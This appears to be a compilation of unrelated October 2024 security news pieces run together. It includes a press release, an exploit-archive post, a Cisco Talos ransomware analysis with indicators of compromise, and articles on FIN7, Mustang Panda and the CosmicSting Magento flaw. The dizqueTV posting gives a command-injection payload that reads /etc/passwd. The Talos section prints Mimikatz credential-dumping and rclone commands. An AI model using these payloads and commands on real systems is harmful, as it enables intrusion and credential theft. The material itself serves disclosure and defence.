San Francisco, United States / California, 3rd October 2024, CyberNewsWire

**San Francisco, United States / California, October 3rd, 2024, CyberNewsWire**

Doppler, the leading platform in secrets management, today announces the launch of **Change Requests**, a new feature providing engineering teams with a secure, auditable approval process for managing and controlling secret changes across environments. Designed to enhance security, compliance, and team collaboration, **Change Requests** gives organizations the tools to mitigate the potential risks from misconfigurations or unauthorized changes and maintain a comprehensive audit trail of all secret modifications. This launch comes at a time when organizations are facing increased security and compliance demands, particularly in managing sensitive information.

As security breaches and insider threats continue to rise, managing secrets has become a growing challenge for teams of all sizes; protecting sensitive information at every stage of the software development lifecycle is critical. According to a recent study by Cybersecurity Ventures, cybercrime damages are expected to cost the world $9.5 trillion in 2024 alone, and compromised secrets and misconfigurations remain significant factors in these attacks. In 2023, GitGuardian reported that there were 12.8 million incidents of exposed secrets on Github which is an increase of 28% from 2022, highlighting the need for tighter controls over sensitive information.

Doppler’s **Change Requests** is designed to address these risks by introducing a formalized, auditable approval process for secrets management. This feature offers teams a centralized and controlled way to manage changes to sensitive information while maintaining full visibility into who made updates and when.

**Addressing Needs for Security and Compliance**

*   **Reducing Misconfiguration:** According to the most recent Verizon Data Breach Investigation Report, breaches as a result of errors grew by 28%. By treating secret changes like code, Doppler seeks to help companies decrease this number and reduce the chances of misconfigurations reaching production. With Change Requests, organizations can require peer reviews and approvals for every configuration change to ensure all updates undergo proper scrutiny before being deployed.
*   **The Growing Compliance Burden:** Cybersecurity standards are increasingly holding companies accountable for how they handle sensitive data. Organizations need clear audit trails and compliance-friendly processes. Paired with detailed activity logging, Change Requests further eases the burden teams face by keeping a complete, auditable trail of every request, review, and change, providing a fully traceable history.
*   **Enforce Security with Controlled Access:** As teams grow, so does the complexity of managing secrets. Organizations can safeguard sensitive secrets with custom roles and user groups by enforcing a structured approval process, ensuring only authorized personnel can make critical updates. This helps prevent unauthorized changes and boosts their overall security posture while keeping teams nimble.

**Building Trust Through Security**

> “It’s incredibly exciting to ship our most demanded feature by both developers and enterprises! Just as pull requests have increased the level of trust with production code, Doppler will fill that long awaited gap with secrets,” said **Brian Vallelunga**, CEO of Doppler. “I’m confident that Doppler’s Change Requests is going to establish a new paradigm for managing secrets securely at enterprise scale—undergoing approval, maintaining a rich audit trail for security and compliance, and integrating natively with production infrastructure for uninterrupted, no-downtime rollouts.”

**Availability**

The Change Requests feature is available now for all users on Doppler’s Enterprise plan. To learn more about implementing Change Requests and how it can improve the organization’s security and compliance efforts, users can visit Doppler’s documentation.

**About Doppler**

Doppler is the leading platform for managing secrets such as environment variables, API keys, and tokens in a centralized, secure, and scalable way. Trusted by thousands of security-conscious teams around the world, Doppler provides developers with the tools they need to keep secrets in sync across every app, service, and infrastructure. Built with security in mind, Doppler offers robust integrations, comprehensive logging, and enterprise-grade encryption to ensure sensitive data remains protected throughout its lifecycle.

**Contact**

**Doppler Press**  
**\[email protected\]**

Doppler Launches ‘Change Requests’ to Strengthen Secrets Management Security with Audited Approvals

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

**dizqueTV 1.5.3 Remote Code Execution**

Posted Oct 3, 2024

Authored by Ahmed Said Saud Al-Busaidi

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution

SHA-256 | b18cb14167c97952ef1684789d6a48b83e5c1338a0677edc0b3eaef195497b45

Download | Favorite | View

**dizqueTV 1.5.3 Remote Code Execution**

    # Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)# Date: 9/21/2024# Exploit Author: Ahmed Said Saud Al-Busaidi# Vendor Homepage: https://github.com/vexorian/dizquetv# Version: 1.5.3# Tested on: linuxPOC:## Vulnerability DescriptiondizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.## STEPS TO REPRODUCE1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"3. click on update4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

**File Tags**

*   ActiveX (933)
*   Advisory (87,037)
*   Arbitrary (17,123)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,049)
*   Code Execution (7,927)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,438)
*   DoS (25,312)
*   Encryption (2,395)
*   Exploit (54,379)
*   File Inclusion (4,278)
*   File Upload (1,026)
*   Firewall (822)
*   Info Disclosure (2,927)
*   Intrusion Detection (921)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,313)
*   Local (14,866)
*   Magazine (587)
*   Overflow (13,229)
*   Perl (1,435)
*   PHP (5,293)
*   Proof of Concept (2,415)
*   Protocol (3,753)
*   Python (1,664)
*   Remote (31,931)
*   Root (3,674)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,055)
*   Shell (3,310)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,739)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,135)
*   Web (10,147)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,308)
*   Other

**File Archives**

*   October 2024
*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,132)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,415)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,936)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,896)
*   UNIX (9,464)
*   UnixWare (188)
*   Windows (6,782)
*   Other

dizqueTV 1.5.3 Remote Code Execution

Malwarebytes Browser Guard now warns users about recent data breaches, as well as automatically opting users out of tracking cookies.

Two things are true of data online: It will be collected and, just as easily, it will be lost. 

But a major update to Malwarebytes Browser Guard will better protect users from opaque data collection that happens every day online, as well as raising their awareness about corporate data breaches that have left their sensitive information vulnerable to harm.    

First, Browser Guard will now send helpful notifications to users when they visit a website belonging to a company that has suffered a proven data breach in the past 90 days. While everyday users might already know about some of the largest breaches in recent history—AT&T comes to mind—it can be nearly impossible to keep track of every single company that has lost user data in the past.  

With these new data breach notifications, Browser Guard will warn users about recent data breaches they perhaps never heard about, from the 2.2 million people affected by the breach of Rite Aid, to the 1.7 million people affected by the breach of Slim CD, to the 500,000 people affected by the breach of the Texas Dow Employees Credit Union.  

Importantly, Browser Guard will not send repeat notifications that pester return users. The notifications will also include direct access to the Malwarebytes Digital Footprint Portal, allowing users to check in real time whether their data was included in any flagged breach.  

In a second, added feature, Browser Guard is also making it easier to stay private online by automatically opting users out of data collection performed by tracking cookies that are littered across the internet, with no extra effort required on users’ behalf.

These types of cookies are present on nearly every single website that people visit today, from Google to Facebook to YouTube to Reddit. They are invisible pieces of code that advertisers use to track user activity even after they leave a website.

This data, when collected in aggregate, can reveal a person’s age, gender, hometown, relationship status, political beliefs, and so much more. And it’s precisely this data that advertisers want, as it helps them micro-target their ads to, say, new dads in Overland Park, Kansas, looking for a lawnmower, or, first-time homeowners in San Francisco needing a washer and dryer that fit in a small space.

For more than a decade, this type of data collection happened invisibly, but when the European Union passed a sweeping set of data protection rights in 2016, much of that changed.

Following the passage of the law (referred to in short as GDPR), users began to see cumbersome popups everywhere across the web that asked about “cookie preferences”—preferences around how these invisible trackers would collect information both for the website itself and for the advertisers using that website to deliver ads.

With the latest Browser Guard update, cookie consent forms will now be auto-rejected, thus requesting the site to honor the most privacy-preserving settings.

What people experience is a simpler and less aggravating internet, where they’re no longer forced to manage yet another aspect of their privacy.

**Download for Free today:**

For a live look at the new Browser Guard, see the video below.

 Browser Guard now flags data breaches and better protects personal data   

The malware, called "BabyLockerKZ," has primarily affected users in Europe and South America.

*   Cisco Talos has discovered a financially motivated threat actor, active since 2022, recently observed delivering a MedusaLocker ransomware variant. 
*   Intelligence collected by Talos on tools regularly employed by the threat actor allows us to see an estimate of the amount and countries of origin of this group’s victims. This actor has been active since at least late 2022 and targets organizations worldwide, although the number of victims was higher than average in EU countries until mid-2023 and, since then, in South American countries.
*   This threat actor was observed distributing a MedusaLocker ransomware variant known as “BabyLockerKZ.” This variant is compiled with a PDB path containing the word “paid\_memes” which is also present in other tools observed during the attacks, presumably by the same author.
*   Talos has new information on the attacker’s tools, including BabyLockerKz and attacker TTPs and IOCs to assist in detecting and preventing further attacks.

Talos has recently observed an attack leading to the deployment of a MedusaLocker ransomware variant known as “BabyLockerKZ.” The distinguishable techniques — including consistently storing the same set of tools in the same location on compromised systems, the use of tools that have the PDB path with the string “paid\_memes,” and the use of a lateral movement tool named “checker” — used in the attack led us to take a deeper look to try to understand more about this threat actor. 

This attacker uses several publicly known attack tools and living-off-the-land binaries (LoLBins), a set of tools built by the same developer (possibly the attacker) to assist in credential theft and lateral movement in compromised organizations. These tools are mostly wrappers around publicly available tools that include additional functionality to streamline the attack process and provide graphical or command-line interfaces. 

The same developer built the MedusaLocker variant used in the initial attack. This variant that uses the same chat and leak site URLs contains several differences to the original MedusaLocker ransomware, such as a different autorun key or an extra public and private key set stored in the registry. Based on the name of the autorun key, the attackers call this variant “BabyLockerKZ.” 

We assess with medium confidence that the actor is financially motivated, likely working as an IAB or an affiliate of a ransomware cartel, and has been carrying out attacks since at least 2022. Our telemetry indicates that the actor opportunistically targeted many victims worldwide. In late 2022 and early 2023, most victims were in European countries, but since the first quarter of 2023, the group’s focus shifted toward South American countries and, as a result, the number of victims per month almost doubled.

**Tracking BabyLockerKZ across the globe**

Intelligence collected by Talos on tools regularly employed by the threat actor allows us to estimate the number of, and the countries of origin of the victims. Although this is unlikely to capture all of the adversary’s activities, it still provides a look at a specific window of activity.

The actor has been active since at least October 2022. At that time, the targets were mostly located in European countries such as France, Germany, Spain or Italy. During the second  quarter of 2023, the attack volume per month almost doubled, and the group shifted its focus toward South American countries such as Brazil, Mexico, Argentina and Colombia, as shown in the chart below. The attacks kept a steady volume of around 200 unique IPs compromised per month until the first quarter of 2024 when the attacks decreased.

The actor has consistently compromised a large number of organizations, often more than 100 per month, since at least 2022. This reveals the professional and highly aggressive nature of the attacks and is coherent with the activity we would expect from an IAB or ransomware affiliate.

During the attack leading to the deployment of the BabyLockerKZt, the adversary used several publicly known attack tools and others that could be unique to this actor. The group frequently used the Music, Pictures or Documents user folders of compromised systems to store attack tools. For example, the following paths were used to store tools during this attack:

*   c:\\users\\<user>\\music\\advanced\_port\_scanner\_2.5.3869.exe
*   c:\\users\\<user>\\music\\hrsword\\hrsword install.bat
*   c:\\users\\<user>\\music\\killav\\build.004\\disabler.exe
*   c:/users/<user>/music/checker/checker(222).exe
*   c:/users/<user>/music/checker/invoke-thehash.ps1
*   c:/users/<user>/music/checker/checker (222).exe
*   c:/users/<user>/music/checker/invoke-smbexec.ps1
*   c:/users/<user>/music/checker/invoke-wmiexec.ps1
*   c:/users/<user>/appdata/roaming/ntsystem/ntlhost.exe.exe
*   c:/users/<user>/appdata/local/temp/advanced port scanner 2/advanced\_port\_scanner.exe
*   c:/users/<user>/appdata/local/temp/is-juad3.tmp/advanced\_port\_scanner\_2.5.3869.tmp

These are similar to a previous attack leading to MedusaLocker ransomware, documented by ASEC in February 2023, which our telemetry suggests was a more active period for this threat actor.

Some of the publicly known tools used by the attacker are:

*   HRSword\_v5.0.1.1.rar: A tool used to disable AV and EDR software.
*   Advanced\_Port\_Scanner\_2.5.3869.exe: A network-scanning tool with several additional features to map internal networks and devices.
*   Netscan.exe: SoftPerfect Network Scanner: A tool similar to Advanced Port Scanner.
*   Processhacker.exe: Process Monitoring and administration software. Allows a TA to enumerate and control processes running on the infected endpoint.
*   PCHunter64.exe: A tool similar to processhacker.
*   Mimikatz: A tool to dump Windows user credentials from memory.

While most of the tools the attacker uses are publicly available, they also use some tools that are not widely distributed that streamline the attack process by automating the interaction between popular attack tools (e.g., Mimikatz, Invoke-the-hash, PSEXEC, RDP) and by adding convenient functionality and interfaces. One of these tools, called “Checker” used in an attack that deployed BabyLockerKZ, consisted of pivotal characteristics of BabyLockerKZ, the “Checker” tool has a PDB path containing the string “**paid\_memes**”. Pivoting off this string, we identified files on VirusTotal, of which most are BabyLockerKZ samples. We also discovered several other tools, which we’ll outline below.

Checker (E:\\**paid\_memes**\\wmi\_smb\_rdp\_checker\\Release\\checker.pdb) is an app that bundles several other freely available apps and provides a GUI for management of credentials as the attackers proceed with lateral movement. In particular it contains a set of tools:

*   Remote Desktop Plus
*   PSEXEC
*   MIMIKATZ

And a set of scripts based on the Invoke-TheHash tool.

The tool also contains a GUI, as shown below, and a database to store the credentials.

As the image illustrates, the tool can be used to scan IPs for valid credentials using several protocols/techniques (PSEXEC, RDP, SMB and WMI) and is prepared to import data from lists of hosts and some of the tools in the attacker toolset, such as Mimikatz, as well as an advanced port scanner. The tool can also decrypt hashes and offers the convenience of a GUI to store a database of the hosts and respective credentials that have been obtained or verified.

**PTH project**

The PTH (D:\\Projects\\**paid\_memes**\\PTH\\Release\\PTH.pdb) name suggests the pass-the-hash technique to use NTLM hashes to authenticate remotely without having to crack the password. Looking at its resources it embeds:

*   Invoke-SMBClient.ps1
*   Invoke-SMBEnum.ps1
*   Invoke-SMBExec.ps1
*   Invoke-TheHash.ps1
*   Invoke-WMIExec.ps1

These were also used in the checker tool and are part of Invoke-TheHash. According to the author: 

_“Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.”_

MIMIK (D:\\Projects\\**paid\_memes**\\mimik\\Release\\stub\_mimik.pdb) is a wrapper around Mimikatz and rclone that can be used to steal credentials and automatically upload them to an attacker-controlled server. The following image shows the terminal output for the tool.

The following command lines are examples of commands executed via the tool:

*   64.exe privilege::debug sekurlsa::logonPasswords token::elevate lsadump::sam full exit 
*   C:\\Users\\user\\Desktop\\64.exe 64.exe "privilege::debug" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam full" exit 
*   64.exe "privilege::debug" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam full" exit
*   C:\\Users\\user\\Desktop\\rclone.exe rclone rcd --rc-no-auth --bwlimit=30M
*   C:\\Users\\user\\Desktop\\rclone.exe rclone rc operations/stat

**BabyLockerKZ**

BabyLockerKZ is a variant of MedusaLocker that has been around at least since late 2023 and has been analyzed by other researchers, although not specifically called out as a MedusaLocker variant with this name. 

A Cynet blog post on the malware used the name “Hazard” for a MedusaLocker variant (named after the extension used for encrypted files) and mentions the existence of the BabyLockerKZ registry key. 

Another post from Whitehat mentions the existence of PAIDMEMES PUBLIC and PRIVATE registry keys on a MedusaLocker sample. 

This variant has not been given much attention outside of that, though, possibly because it’s highly similar to MedusaLocker or because it uses the same chat and leak sites as MedusaLocker. But there are several notable differences between BabyLockerKZ and MedusaLocker, such as:

*   No {8761ABBD-7F85-42EE-B272-A76179687C63} mutex.
*   No MDSLK reg key.
*   The PAIDMEMES Public and private keys.
*   The BabyLockerKZ run key.

The use of the PAIDMEMES public and private keys is unclear. In their post, Whitehat mentioned that they believe the keys aren’t necessary for the encryption process, as the Linux version doesn’t use them. Further research into the use of these keys might be a topic for another blog post.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 

**Open-source Snort Subscriber Rule Set** customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. SIDs for this threat: Snort3 Rules: 1:300998:1:0 Snort2 Rules: 1:63928:1:0, 1:63929:1:0

**ClamAV** detections are also available for this threat:  
Win.Ransomware.MedusaLocker-10035000-1  
Win.Tool.PassTheHash-10034996-0  
Win.Ransomware.MedusaLocker-10035000-0

**Indicators of Compromise**

IOCs for this research can be found at our Github repository here

**BabylockerKZ:**

33a8024395c56fab4564b9baef1645e505e00b0b36bff6fad3aedb666022599a

b8c994e3ed7dcc9080916119ddc315533c129479f508676d7544b82b2e24745f

63eb3d2886d9cb880c9b0d54b94f3e149b3b5b6215a33a0ef63588a09dcd4499

270c3354b3ee2940b499e365eaba143fba9d458f434dc38e663dc0f08e96121e

759b96f44806578cc0836a3a2bf11c8bc553effac72f8d28b94aec78b66be906

**PTH:**

9f066975f1e02b29c7c635280f405c59704ce4f4e06b04e9ac8a7eac22acd3c7

8bc455e5de35290f8a94376357947bd72aaf6f4d452c25a8ef444e037ef76b9f

**Checker:**

d00f7cf6af68ba832b9d364f28411346cfe66fd3b1f5bcac318766add29ff7f0

1f2df15442593b159e45d16a27e4d43d3a9062da212a588ba4c048f214a0b7be

1e9246e6a35731143368eaa0ade4f3cf576d6b22e6090152f6e94f1fa3070651

6ae3a58a78be9c606009c657de4e390538b21ad951e62b6f4d31138e1a75732c

2eddfe711c32ef1668e14a10d00452c83c29e394e17c41f491550a1583c1bcac

**HOHOL1488:**

dc4840a0992b218cbedd5a7ac5c711cb98f1f9e78a8ffdea37c694061dfd34c6

48046fb0e566f5a2d184f84b76d6cadc458762556daed0ae4a3a1200afbefb54

c0c726a23111c220d022fcd01a85f9788249e42baece03f83b6059170453b801

012657c4548d9c98223caa4cc7aa52fc083d6983d42fde16ca3271412e7fe3fe

8edbb1944d94ff91ee917c31590b6d1d5690a52fc153e44355ee9749aa0f4625

364f1b7466d8e4c9f55294ecf1f874c763bcf980c59b0250c613ac366def6aca

5d5d639fdfbf632bb7d9f1bb28731217d09d36078ab5e594baf2a5a41267a5d2

**PDB list:**

d:/projects/paid\_memes/virus/release/stub.pdb

e:/locker/bin/stub\_win\_x64\_encrypter.pdb

i:/locker/bin/stub\_win\_x64\_encrypter.pdb

d:/education/locker/bin/stub\_win\_x64\_encrypter.pdb

d:/education/locker/bin/stub\_win\_x86\_encrypter.pdb

d:/projects/paid\_memes/wmi\_smb\_rdp\_checker/release/checker.pdb

d:/projects/paid\_memes/mimik/release/stub\_mimik.pdb

i:/locker/x64/release/phantom.pdb

d:/projects/paid\_memes/pth/release/pth.pdb

**Registry keys:**

HKEY\_USERS\\%SID%\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKEY\_USERS\\%SID%\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKEY\_CURRENT\_USER\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKEY\_CURRENT\_USER\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKCU\\SOFTWARE\\PAIDMEMES\\PUBLIC

HKCU\\SOFTWARE\\PAIDMEMES\\PRIVATE

HKEY\_CURRENT\_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

HKEY\_USERS\\%SID%\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\BabyLockerKZ

**Extension names observed being used by BabyLockerKZ samples:**

crypto125

crypto1317

crypto165

crypto41

crypto76

encrypted1

hazard11

hazard21

hazard23

hazard24

hazard25

hazard27

hazard31

hazard38

hazard49

hazard55

hazard56

hazard7

infected

lock2

lock3

lock5

locked9

lockfiles

meduza210

rapid1

rapid10

readtext13

readtext47

readtext49

recovery29

recovery70

virus2

virus3

virus57

**Encryption key BabyLockerKZ:**

PUTINHUILO1337

**MUTEX BabyLockerKZ:**

HOHOL1488

Threat actor believed to be spreading new MedusaLocker variant since 2022

The FIN7 group is mounting a sophisticated malware campaign that spans numerous websites, to lure people with a deepfake tool promising to create nudes out of photos.

Source: Mike via Adobe Stock Photo

The notorious FIN7 threat group is combining artificial intelligence (AI) with social engineering in an aggressive, adult-themed threat campaign that dangles lures for access to technology that can "deepfake" nude photos — all to fool people into installing infostealing malware.

The powerful Russian financial cybercrime group has created at least seven websites that advertise for what's called a "DeepNude Generator," which promises to use deepfake technology transform any photo into a nude representation of the person pictured, according to new research from the threat hunters at Silent Push.

People can either download the generator via the site or sign up for a "free trial," demonstrating the sophistication of the scam. But instead of receiving the tool, they end up downloading malicious payloads such as the stealers Lumma and Redline, which can be used to deliver further malware such as ransomware, the researchers said.

Given the provocative lure, organizations are vulnerable to the campaign, as it may entice  unsuspecting employees to download malicious files. "These files may directly compromise credentials via infostealers or be used for follow-on campaigns that deploy ransomware," according to a blog post about the research.

Meanwhile, FIN7 also continues to promote an existing malvertising campaign that targets corporate users with lures to content by popular brands — including  SAP Concur, Microsoft, Thomson Reuters, and FINVIZ stock screening —  to spread the NetSupport RAT and .MSIX malware, according to Silent Push. The researchers identified a number of active IPs and thus "active new websites" hosting the ploy, which asks people to download a fake "required browser extension," which is actually a malicious payload, to view content related to the brands.

Related:Thousands of DrayTek Routers at Risk From 14 Vulnerabilities

**Fin7 Evolves With the Times**

The DeepNude Generator campaign demonstrates particularly sophisticated thought and planning on the part of FIN7, which developed at least seven dedicated websites URLs —such as aiNude\[.\]ai, easynude\[.\]website, and ai-nude\[.\]cloud — to make it appear convincing.

There is also evidence that FIN7 is employing search engine optimization (SEO) to keep users engaged and to rank their honeypots higher in search results by using footer links to "Best Porn Sites" on its sites. Those links direct victims to other malicious sites dangling the same lure.

Moreover, the group invested effort in creating two website versions for promoting the deepfake tool. The first involves a DeepNude Generator "free download," and the second offers site visitors a DeepNude Generator "free trial," each with a different attack flow.  

Related:Python-Based Malware Slithers Into Systems via Legit VS Code

The first uses "a simple user flow" that uses a "free download" link leading users to a new domain featuring a Dropbox link or another source hosting a malicious payload, according to Silent Push.

The second attack flow prompts users via a "free trial" button to upload an image to test the generator. If this is done, the user is next prompted with a “trial is ready for download” message, with a corresponding pop-up requires the user to answer the question: "The link is for personal use only, do you agree?"

"If the user agrees and clicks 'download,' they are served a .zip file with a malicious payload" that leads to the Lumma Stealer, and which uses a DLL side-loading technique for execution, according to Silent Push.

**Mitigation & Defense Against Fin7**

The two campaigns demonstrate that FIN7 — a cybercrime collective also known as Carbanak, Carbon Spider, Cobalt Group, and Navigator Group that's been active since 2012 — remains an imminent threat despite many attempts by law enforcement to shut it down, or at least significantly disrupt it. It also shows a tenacity on the group's part to evolve with modern technology and psychological tactics to create more sophisticated ways to spread malware, the researchers said.

Related:Dragos Expands ICS Platform With New Acquisition

Indeed, FIN7 has long been known for its savvy combination of malware and social engineering, having mounted a slew of successful, financially motivated attacks against global organizations that have hauled in well over $1.2 billion — and counting — for the criminal enterprise.

To help organizations combat threats from FIN7 and other organized cybercriminal groups, developing indicators of attack based on the group's tactics, techniques, and procedures (TTPs) is one method. Also, training employees to be aware of these increasingly elaborate social engineering tactics that threat groups use, and blocking the download of any unknown any files from the Internet onto a machine connected to a corporate network also can help enterprises avoid compromise by sophisticated threat campaigns.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

AI 'Nude Photo Generator' Delivers Infostealers Instead of Images

The prolific Chinese APT Mustang Panda is the likely culprit behind a sophisticated cyber-espionage attack that sets up persistent remote access to victim machines.

Source: Gerry Pearce via Alamy Stock Photo

A known Chinese advanced persistent threat (APT) group known as Mustang Panda is the likely culprit behind a sophisticated, ongoing cyber-espionage campaign. It starts with a malicious email, and ultimately uses Visual Studio Code (VS Code) to distribute Python-based malware that gives attackers unauthorized and persistent remote access to infected machines.

Researchers from Cyble Research and Intelligence Lab (CRIL) discovered the campaign, which spreads an .lnk file disguised as a legitimate setup file to download a Python distribution package. In reality, it's used to run a malicious Python script. The attack relies upon the use of VS Code, which, if not present on the machine, will be deployed via the installation of the VS Code command line interface (CLI) by the attacker, the researchers noted in analysis published Oct. 2.

"The \[threat actor (TA)\] leverages a \[VS Code\] tool to initiate a remote tunnel and retrieve an activation code, which the TA can use to gain unauthorized remote access to the victim’s machine," according to the blog post about the attack. "This enables the TA to interact with the system, access files, and perform additional malicious activities," which include exfiltrating data and delivering further malware.

Related:Dragos Expands ICS Platform With New Acquisition

Though attribution for the attack is not entirely clear, the researchers found Chinese-language elements and identified tactics, techniques, and procedures (TTPs) in the attack flow that point to the Chinese APT group perhaps best known as Mustang Panda. Cyble tracks it as Stately Taurus, and it also goes by the names Bronze President, Camaro Dragon, Earth Preta, Luminous Moth, and Red Delta.

The attack starts with the execution of the .lnk file, which displays a fake “successful installation” message in Chinese while it silently downloads additional components in the background. Among those is a Python distribution package, which eventually downloads a malicious script. This is the aforementioned Python script, which once executed checks whether VS Code is already installed on the system by checking for the existence of a particular directory. If it is not found, the script then proceeds to download the VS Code command line interface (CLI) from a Microsoft source.

Eventually, this script sets up a task to ensure the persistence of its malicious activities, which include establishing a remote tunnel to give attackers access to the infected machine. When establishing the tunnel, the attackers use VS Code Remote-Tunnels, an extension typically used to connect to a remote machine, such as a desktop PC or virtual machine (VM), via a secure tunnel, according to Cyble. "This enables users to \[remotely\] access the machine from any \[VS Code\] client without the need for SSH," according to the post.

Related:Millions of Kia Vehicles Open to Remote Hacks via License Plate

The attackers also leverage another legitimate entity, the developer repository GitHub, in a strategic way to access files on the infected machine. When setting up the remote tunnel, the script automatically associates it with a GitHub account for authentication, and extracts an activation code to enable further malicious activity later in the attack.

The malware also extracts a list of processes currently running on the victim’s machine and sends them directly to the command-and-control (C2) server, and goes on to gather further sensitive data, such as the system’s language settings, geographical location, computer name, user name, user domain, and details about user privileges. It also collects the names of folders from several directories.

After the attackers receive the exfiltrated data, they can log in for remote access to the device using a GitHub account. "Here, the TA can enter the exfiltrated alphanumeric activation code to gain unauthorized access to the victim’s machine," according to Cyble.

Related:Pwn2Own Auto Offers $500K for Tesla Hacks

"This degree of access not only enables them to browse through the victims’ files but also enables them to execute commands through the terminal," according to the post. "With this control, the TA can perform a variety of actions, such as installing malware, extracting sensitive information, or altering system settings, potentially leading to further exploitation of the victim’s system and data."

**APT Defense Requires Cyber Vigilance**

At the time Cyble published the research, the malicious Python script deployed by the attack had no detections on VirusTotal, which makes it difficult for defenders to detect it through standard security tools, the researchers noted.

To mitigate these kinds of attacks by sophisticated APTs like Mustang Panda, Cyble recommends that organizations use advanced endpoint protection solutions that include behavioral analysis and machine-learning capabilities to detect and block suspicious activities, even those involving legitimate applications like VS Code. Defenders also should review scheduled tasks on all systems regularly to identify unauthorized or unusual entries, which can help detect persistence mechanisms established by threat actors.

Other mitigation activities include setting up training sessions to educate users about the risks of opening suspicious files or links, particularly those related to .lnk files and unknown sources. Organizations also as a general rule should limit user permissions to install software, particularly for tools that can be exploited, like VS Code, as well as use application whitelisting to control which applications can be installed and run on systems.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Python-Based Malware Slithers Into Systems via Legit VS Code

Cybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting.
Tracked as CVE-2024-34102 (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming,

Vulnerability / Data Breach

Cybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting.

Tracked as **CVE-2024-34102** (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming, credited to a researcher named "spacewasp," was patched by Adobe in June 2024.

Dutch security firm Sansec, which has described CosmicSting as the "worst bug to hit Magento and Adobe Commerce stores in two years," said the e-commerce sites are being compromised at the rate of three to five per hour.

The flaw has since come under widespread exploitation, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add it to the Known Exploited Vulnerabilities (KEV) catalog in mid-July 2024.

Some of these attacks involve weaponizing the flaw to steal Magento's secret encryption key, which is then used to generate JSON Web Tokens (JWTs) with full administrative API access. The threat actors have then been observed taking advantage of the Magento REST API to inject malicious scripts.

This also means that applying the latest fix alone is insufficient to secure against the attack, necessitating that site owners take steps to rotate the encryption keys.

